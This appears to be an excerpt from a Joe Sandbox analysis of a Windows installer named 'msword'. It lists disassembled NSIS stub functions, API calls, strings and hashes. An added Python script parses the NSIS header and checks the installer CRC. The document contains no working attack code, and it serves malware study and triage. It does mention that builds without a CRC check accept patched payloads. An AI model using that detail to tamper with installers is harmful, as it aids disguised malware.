                                                                        control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                        APIs
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                        • API String ID: 608394941-1650083594
                                                                        • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                        • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                        • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
                                                                        • CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                        • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
                                                                        • API String ID: 4286501637-1929300520
                                                                        • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                        • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                        • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                        • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403598
                                                                        • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                          • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                          • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                        Strings
                                                                        • soft, xrefs: 00403675
                                                                        • Null, xrefs: 0040367E
                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                        • Error launching installer, xrefs: 004035D7
                                                                        • Inst, xrefs: 0040366C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 4283519449-527102705
                                                                        • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                        • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                        • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
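The function at 00403587 above references the strings "Null", "soft" and "Inst" (xrefs 0040367E, 00403675, 0040366C), the message "Installer integrity check has failed", and a GetModuleFileNameW/GetFileSize/SetFilePointer loop over its own image. Together with the "NSIS Error" string seen in the 00406009 subcall, that identifies the dropped PE as a Nullsoft (NSIS) installer stub and this function as its self-check: it scans its own file for the NSIS "firstheader" and, unless the header's flags disable it, verifies the CRC appended to the end of the file. The script below is an added example for triaging such a dropped file offline; it is not code from this report or from the NSIS project. The header layout, the FH_SIG/"NullsoftInst" constants, the flag bits, the 512-byte block scan and the trailing CRC32 are taken from NSIS's public source (Source/exehead/fileform.h and Main.c), not from this page; the function names (find_firstheader, verify_crc, triage, build_sample) are the example's own, and the installer image it checks is a constructed fixture, not the analysed sample.

```python
import struct
import zlib

# NSIS "firstheader" (Source/exehead/fileform.h), 28 bytes little-endian:
#   int flags; int siginfo; int nsinst[3]; int length_of_header;
#   int length_of_all_following_data;
FIRSTHEADER = struct.Struct("<II12sII")
FH_SIG = 0xDEADBEEF
NSIS_MAGIC = b"NullsoftInst"        # FH_INT1 'Null', FH_INT2 'soft', FH_INT3 'Inst'
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4                 # built with "CRCCheck off"
FH_FLAGS_FORCE_CRC = 8              # built with "CRCCheck force" (overrides a /NCRC switch)
FH_FLAGS_MASK = 15
BLOCK = 512                         # the stub reads itself in 512-byte blocks until the header is found


def find_firstheader(data: bytes):
    """Locate the NSIS firstheader the way the stub does.

    Candidates are only examined at 512-byte aligned offsets and must carry
    FH_SIG, the three magic dwords, no unknown flag bits, and a data length
    that actually fits inside the file. Returns (offset, fields) or None.
    """
    for off in range(0, len(data) - FIRSTHEADER.size + 1, BLOCK):
        flags, sig, magic, hdr_len, data_len = FIRSTHEADER.unpack_from(data, off)
        if sig != FH_SIG or magic != NSIS_MAGIC:
            continue
        if flags & ~FH_FLAGS_MASK:          # unknown flag bits: not a valid header
            continue
        if data_len > len(data) - off:      # header claims more data than the file holds
            continue
        return off, {
            "flags": flags,
            "uninstaller": bool(flags & FH_FLAGS_UNINSTALL),
            "silent": bool(flags & FH_FLAGS_SILENT),
            "crc_checked": not (flags & FH_FLAGS_NO_CRC),
            "length_of_header": hdr_len,
            "length_of_all_following_data": data_len,
            "payload_offset": off + FIRSTHEADER.size,   # compressed header/data block starts here
        }
    return None


def verify_crc(data: bytes) -> bool:
    """Recompute the installer CRC: standard CRC32 over every byte except the
    last four, which hold the stored CRC (little-endian). A mismatch is the
    'Installer integrity check has failed' path referenced at 004037C5."""
    if len(data) < 4:
        return False
    stored = struct.unpack_from("<I", data, len(data) - 4)[0]
    return (zlib.crc32(data[:-4]) & 0xFFFFFFFF) == stored


def triage(data: bytes) -> dict:
    """Summarise a file: is it an NSIS installer, where is the header, does the CRC hold."""
    hit = find_firstheader(data)
    if hit is None:
        return {"nsis": False}
    off, fields = hit
    result = {"nsis": True, "offset": off, **fields}
    # The stub skips the check entirely when FH_FLAGS_NO_CRC is set.
    result["crc_ok"] = verify_crc(data) if fields["crc_checked"] else None
    return result


def build_sample(payload: bytes, flags: int = 0, with_crc: bool = True) -> bytes:
    """Constructed fixture (not a real PE): a 1024-byte dummy stub, a firstheader,
    the payload, and the CRC appended the way makensis does. length_of_header
    is normally the decompressed size of the installer's header block; here it
    is just a placeholder."""
    stub = b"MZ" + b"\x00" * (1024 - 2)
    data_len = FIRSTHEADER.size + len(payload) + (4 if with_crc else 0)
    header = FIRSTHEADER.pack(flags, FH_SIG, NSIS_MAGIC, len(payload), data_len)
    image = stub + header + payload
    if with_crc:
        image += struct.pack("<I", zlib.crc32(image) & 0xFFFFFFFF)
    return image


if __name__ == "__main__":
    image = build_sample(b"payload" * 100)
    print(triage(image))
    damaged = bytearray(image)
    damaged[1100] ^= 0xFF               # one flipped payload byte fails the integrity check
    print(triage(bytes(damaged)))
```

On a real dropped file, `triage(open(path, "rb").read())` gives the header offset, whether the build disabled its CRC (a detail worth recording, since a stub with FH_FLAGS_NO_CRC will happily run a patched payload), and `payload_offset`, which is where an extractor such as 7-Zip's NSIS handler starts decompressing the header block that holds the installer script.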

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 004033E7
                                                                        • GetTickCount.KERNEL32 ref: 00403464
                                                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                        • wsprintfW.USER32 ref: 004034A4
                                                                        • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                        • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileTickWrite$wsprintf
                                                                        • String ID: ... %d%%$P1B$X1C$X1C
                                                                        • API String ID: 651206458-1535804072
                                                                        • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                        • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                        • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                        • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                        • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                        • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                        • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 2740478559-0
                                                                        • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                        • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                                        • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                                        APIs
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GlobalFree.KERNELBASE(00819EC0), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGloballstrcpyn
                                                                        • String ID: Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
                                                                        • API String ID: 1459762280-187782834
                                                                        • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                        • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                                        • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                                        • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                        • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                        • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                        • GlobalFree.KERNELBASE(00819EC0), ref: 00402387
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 3376005127-0
                                                                        • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                        • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                                        • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                                        • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
